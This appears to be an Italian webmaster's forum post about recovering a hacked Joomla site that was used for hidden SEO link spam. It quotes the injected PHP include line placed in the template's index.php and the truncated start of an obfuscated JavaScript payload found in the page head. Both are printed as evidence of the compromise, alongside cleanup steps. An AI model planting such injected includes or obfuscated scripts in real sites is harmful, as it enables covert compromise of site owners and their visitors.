Ringraziando M. per l'attenzione e il post scritto, a seguire la mia esperienza che magari serva a qualcuno:
innanzitutto, non so come sono entrati, probabilmente la versione non aggiornata del core, quindi importante è aggiornare (me lo dico ovviamente anche da solo).
Verificare eventuali aggiornamenti dei moduli e componenti e plugin etc installati.
Anche se poi magari è per colpa del mio ISP che non nomino per ovvie ragioni.
Comunque:
1. hanno inserito uno script che richiamava un modulo sempre da loro inserito nel file INDEX.PHP della template in uso.
Ovviamente tale richiamo và eliminato, nel mio caso visto che comunque con attenzione mantengo un backup dei file e del DB in locale, è stato veole rimettere il MIO file originale.
Và comunque letto ed intepretato lo script per capire cosa fa, in questo caso è stato facile:
<?php @include_once("./".preg_replace("/[^\/]*\//","../",preg_replace("/^\//","",preg_replace("/[^\/]+$/","",$_SERVER["REQUEST_URI"])))."./".preg_replace("/[^\/]*\//","../",preg_replace("/^\//","",preg_replace("/[^\/]+$/","",$_SERVER["REQUEST_URI"])))."./".preg_replace("/[^\/]*\//","../",preg_replace("/^\//","",preg_replace("/[^\/]+$/","",$_SERVER["REQUEST_URI"])))."/modules/com_k2/copy_right.php");?>
dove chiaramente bisogna seguire e leggere il file copy_right.php e quindi da questo vedere cosa ealtro è implicato.
Inoltre c'era questo strano script nelle prime righe tra i tag <head>:
ne scrivo solo l'inizio:
type="text/javascript"> <!-- $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+" \\"+$.__$+$.$$_+$.___+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"_"+(![]+"")[$._$_]+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.$$_+$._$$+" \\"+$.$$$+$.$_$+" []\\"+$.$$$+$._$$+"\\"+$.__$+$._$_+" "+$.$$$$+$._+"\\"+$.__$+$.$_$+$.$$_+$.$$__+$.__+"\\"+$.__$+$.$_$+$.__$+$._$+"\\"+$.__$+$.$_$+$.$$_+" \\"+$.__$+$.$$_+$._$$+$.$$$_+$.__+"\\"+$.__$+$.___+$.$$$+(![]+"")[$._$_]+$._$+$.$_$$+$.$_$_+(![]+"")[$._$ etc.
2. erano state inserite 2 cartelle nella cartella modules: com_comprofiles e mod_k2
ovviamente ho rimosso tutto il loro contenuto dal server, cosi che non ho più gli strani link tra le mie pagine.
Sicuramente l'unico scopo e di tipo SEO al fine che gli si indicizzino link sfruttando il tuo sito, considerate che all'interno delle funzioni è calcolato che vengano presi 244 caratteri (circa 20 link) alla volta da un file di testo txt che pesava oltre 5mb, il chè significa: una enormità di link!! e che io nelle pagine del sito non li vedevo e tanto meno nel pannello.
Adesso ho reinviato la sitemap a Google sperando che cancelli quanto prima le indicizzaioni fatte a quei link INVADENTI ripulendo la mia chache, lo faro anche su Yahoo, Ask e Bing che sono i motori che mi risultano più intelligenti e con gli strumenti per farlo! se conoscete altri motori con attenzione ai webmaster ditemeli che ci passo!!
Me ne sono accorto grazie al comando site:www.xxxx.com da google che mi porta oltre 500 link su un sito di 30/40 pagine, strano no??
Spero che questo post sia di aiuto, mentre invito il moderatore qual'ora io abbia commesso un abuso ho abbia sbagliato inserendo script e dettagli di cancellarlo o avvisarmi che lo cancello.
Saluti e meno male che me andata bene sta volta và ........
